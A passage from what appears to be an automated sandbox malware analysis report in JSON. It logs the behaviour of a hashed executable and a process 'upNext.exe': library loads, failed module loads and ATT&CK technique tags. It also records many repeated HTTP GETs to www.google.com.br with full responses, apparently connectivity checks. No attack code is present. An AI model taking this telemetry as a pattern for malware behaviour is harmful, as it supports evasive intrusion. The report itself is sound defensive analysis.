00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002104)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"upNext.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"upNext.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vOQKJdP_0t52j7HNFWQQuQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:11:57 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2djOwUb317aXe1ROIaVITKwPQRo29GlnQ1cGXeSjSHqz2fK77Wh-qk; expires=Tue\n 05-Aug-2025 09:11:57 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=q1NC7DyA-19rOhVONbWG-rWfnXEQ0Amoeeg3OtQ7He5g_Lp5a9E2C-PfEIrDpubpzcIS5Hv36aq2C5Js8qk8Unasod4dIFAVyKfsERy_LlgmRm_XzOdrlLQjrPls3_Mp6WPuR05E0TNqlXtNGb6A8VA4c255gywXXK1lNexGr2RzC21_COectMbKA4OvhUYRZzatLNbAfyv-Bw; expires=Fri\n 08-Aug-2025 09:11:57 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dNrphHSicFsLfKGK9EFYRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:11:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dTWVEyQYPgGtWJeXhlP8bAjB4P0tuCtOnFKEHiGCDpvPOMJSu3000; expires=Tue\n 05-Aug-2025 09:11:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=0vn4stWaIANHuKdQq2HxPiOsX0l5xmblS4laId-OVt8r0xLsM8uq4GCciAQ-TfOovjok40wtXbJaSHvjpuBMR5AADwRfL9tF2ESSKLUXgVLLOemchmvTxbh8Ukq307Oe2W_3HyCCaD3fa3o24m29MhyDRvmE7kDRVY4Jozy594iS3HZy85d1_tQQLOWFccivFwayoeRll7xQKKc; expires=Fri\n 08-Aug-2025 09:11:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce--dOj9KKYJjeS4zMRRkZTlw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:11:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eUC3h_zebTYPMWjjEKgSFvWehEeAWz64yg-iSi_x71pGRfPzOLTw; expires=Tue\n 05-Aug-2025 09:11:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=g3LkxGA_O41eVFrfDruVPpuBgmoSlCuRkMnQNwQYU4HWlD1_h6FtR4GQvCPlBOGTEH-QBY557ptQQHZiOt7vB8wS-UUHORM8VPGsSPu4pXz09kB7qhRIfRAVPuNB5SQO0RQkjSHMYiAaeIrvW7EB23Lfh1alQ1hB3L0YlIcV6QICHlLAVnRnO7e4zY4MbHKgjnk-6c40yqs5yQ; expires=Fri\n 08-Aug-2025 09:11:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BNlOr81FrvOnsz6S0Bxp_g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:11:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cMLPKFiilhWBlHvP1qG76J5cSbhK_7udwc-Uaw4wSmhSWOp8sYYK8; expires=Tue\n 05-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=V_xyURPKu15WpkGontsVTbrqGnlNcN3LpabXuWFTWH2WUpDj2EoLw-pdMCqcdtDIWhED1DYs7iS6VfhP079EaarreoIG7beKwQIcAJNRZrVXvwHne8hyOd0gws6TaiAlrwgk7TAVkPM57xMkzB8qVgq_LrC2zglIZL53nwKEtI3m3xXQLxOJdt1ylvjW7QOHuS_uR5-OzKvVWA; expires=Fri\n 08-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7h5EHuOs6Q1QMRAt40sVqg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:11:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eHp14U5Kit81XfByz5-sbhm2l3PxVA5vLt8RAnaVLlm5v1Qe9y6w; expires=Tue\n 05-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=QS_mQCOSfTuUmDFu95vKZzmclN0WaUYb6SzN7bxiWKky6JCl4rbSPtoAVjOWxQUPL-MANN1-950n8a24A26394rciRl2mlc1F_4F1A8o9TcCz7qEM7Bqi6bq682q5sCCAZD4H4DYRIJ4IV9S4w7CaYGgv5CA6dnNnl4soaPfLSFN6wEuDmOUqU_wTxef_y9dS5AGaOZDZKQxHQ; expires=Fri\n 08-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-IMYT0D-2vclDpX3S2CvJ_A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dkassv7Pqs-DUxnqZ0qJyQNsuwqEwdwteuTZ-LeC0jO5yyf2khgA; expires=Tue\n 05-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Llt4Bi-mZbknu5WiBC6fpountJ9VsJ_xmKMIJn8cQo0I62n6e_Fjah9SbzJZQqE_GRXD6ggGI3K1hWvqC38dh9zHG_R7EW59JOa8dCVzMxtxq6HQHVFjJVhorM-wQDUqp3oZtKcu_M8yHEP7MyuTlUdFSL45_fZEF4D8mzg6MFmjlYL5xo23lWB_cqioG5d3ZY9WWVhiky1U1Q; expires=Fri\n 08-Aug-2025 09:11:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-GuF9LJQBcpl9hpVSjrQvdg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eUXodiiqsAmYtTj_WbB8ELO0dikedtLd80Q3Hi_OHQ_pbxVSu1kjs; expires=Tue\n 05-Aug-2025 09:12:00 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=SL4AWgjxpM9H7StVIQHWqW7O0I6tbfT1FT_Pli-1ShdlxRCmUCbOvnm1G0BBhe1xzBEULiZCMs1bCvrnkxUwnwe2e4_sLicbOaYCVCUz77VYfN5AqZmLbDexRaMYqsDCR2D3ShV0zvFtTgB0Wjgx__z9NXaA4pEgEQcNGVDlApJGqCPiGQRF6p8Sz_gdkletGta8ZlfiOHpgrw; expires=Fri\n 08-Aug-2025 09:12:00 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-u8fWwsG-NFOYKQhg-xjfLw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:01 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fqsgPEWTqUYryH0WPvkIpCpUavYwwL7V8peqC1oog5Oi9XjBEoupo; expires=Tue\n 05-Aug-2025 09:12:01 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=vCfCN_KPy43yAfnC-eHxpwvMmWPSXb67UJqFkNq_E-1PyiDDLDb1VDL2N1vBMd5bOEcaU4n6E5A5BqmspAx02ATXSsDsFy2wp70tyJ5rNc9Q1Urao_cKkwkp_kBmEL8ijRKYgiM8s9lULXoHepV5CXSz-pgdkgbyFsCgV29iv6-Kb-m9gC66gHwVHkbqLJwsrdAv-xRFwPW2Lw; expires=Fri\n 08-Aug-2025 09:12:01 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Ber27h5qUJZSuwDWc3BXzg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:01 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fIW0YoVFpggjwefYZWUbDXihaY585BQRhpfN3mqB0OJTvxMCaePA; expires=Tue\n 05-Aug-2025 09:12:01 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=qN_VqsJjYH0gcvYjOz_J18rM8gECuwlPJXJA7R3zkq62ZX5KsgRNBZHCD_jdV3p0WosdvBnjgZ-Jre_957Rb3nMl7-rzPusvCaQniwYeNFZhjx0iLqy5cNDi9z_zh2ch_CJwc4jdgvzLOk4XJ4ZLaOyyAG4jeY5t14qIW351fPnLFPWIMzrtv7F4Hvzt_z1uqxgVLAIJQI45Sb0; expires=Fri\n 08-Aug-2025 09:12:01 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-dH-StTa2iIEO16B8cERpGQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:02 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fTvSIUKvwDdm9uq4rFrYHKA3ppG7n8b_LUeb_Qxss01Cgiwx47Aw; expires=Tue\n 05-Aug-2025 09:12:02 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=tUFS0f0PJAACbBI60mYq84NuuwCWlVDOt3WrUTKUq3Ii5_fIhNTiFld5ZRUL6wP5GSCnchqgmAaeByCU8OHFCceBVtzlNoXyNBdfTXFpi1hvUAP1Ww3IxhDlcR5jG3PHTAdfBAiXzwXMbixleYmiQmpN15L1nczRNP2ds92N9Rv42iPaxj-gKO3uI4TC6BEc0mrVXpGP6sbXFsk; expires=Fri\n 08-Aug-2025 09:12:02 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-xkPNfecdUrQTHcQ-reAzKQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:02 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cpkTIBvz1fZwFHtKhB85AJVA6L_qxz6_hi48IHLcvIxAuXARLOmA; expires=Tue\n 05-Aug-2025 09:12:02 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=m9lCswx-ttko-AYE4J61HKQE4SAV9cmi7raohL-qGPBalTTrtOdjaD_4SFxzDMZk2qgtwLC_8NSW5kkQ1ENgcPo1NtVD5BfPoJfkbueISGJWPhasbdX694gjcyRcx-mxJt5gLw4T3B4G7jR8GhY7f-f5DPfZnp52GckZrBXDLaR7TtiRPpX1Z9EK5uqbCst0DKHI7K3qCMevoz0; expires=Fri\n 08-Aug-2025 09:12:02 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Dazfj0Otq5ARGD1KpDJ02w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:03 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2d24QwLqOA0FEIyJphSSH7vN0MW-rHFvR22RaIAQEaIt5W2FZNLwg; expires=Tue\n 05-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=kCyHzguZaDvPGpzrw0Fb7XmxD0pn6oSNXVUSLIB6kq7hB8XOPl885cbl5F4DZriJ-o1IEHodRDO1UXG74Kxx0uvuq70-zyuHORoMsXLrDhRbGa6AzIUrGxShtoQijNCdqvpC8oQerokK3LxkBGrFSjcURHWHHbREofeCP0J1F8tG5FD49_rrNSVQJZYK-nkeGJtGofMy7fgrdQ; expires=Fri\n 08-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-jczYn8fRWaZfXdjrKTFOmA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:03 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e94dSc6QPumDf4m1IpNUlTzXaOqFyKZ023mp006v6yt5wJKpcToi4; expires=Tue\n 05-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=cKd-d1E3sA2PKtVKbEG_XvlrZplHpATh8ezaWfDT9oOc3e13AVCT41vdEUOcSB3vVJoN1wzTZzdSafI_08GaqdBEdu5A1KhAH_qpJwtGuYguVIJtVbd6poOR2CPr-Sk3R7jE2RqQ1zq0HPqvM49TwOKhHStDRgY42wKIDIF7rD3ATEzDpnjGPRoK4CalrBS03OYiSY2Yd9jwmX0; expires=Fri\n 08-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-G0tGcAkQ93cCd4tq4P2fvw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:03 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eVw9Nr2klG8Sg1s74yz7AI2lz1fRSZQ_ZKHj2ySp-vLVF60QIDMA; expires=Tue\n 05-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=0JPD_gG3CnSyCsdnxB2NL_dif7mJCXFhjFOoEy03ME0cEaKo-7IcPW3o17mCLxe49xX_BxOYXmndSioJlpXmuMfyf1N49OQkde1xvyIzBdh1xfMbziAYhLtQbe6YTnP9l5N1z_uhSJyC0ljCNWZnGTdLpIDzmndUu-k2gGqAQamZghGcMbh3ImD379Z_5Sf40g6dwEzge61CeRM; expires=Fri\n 08-Aug-2025 09:12:03 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body 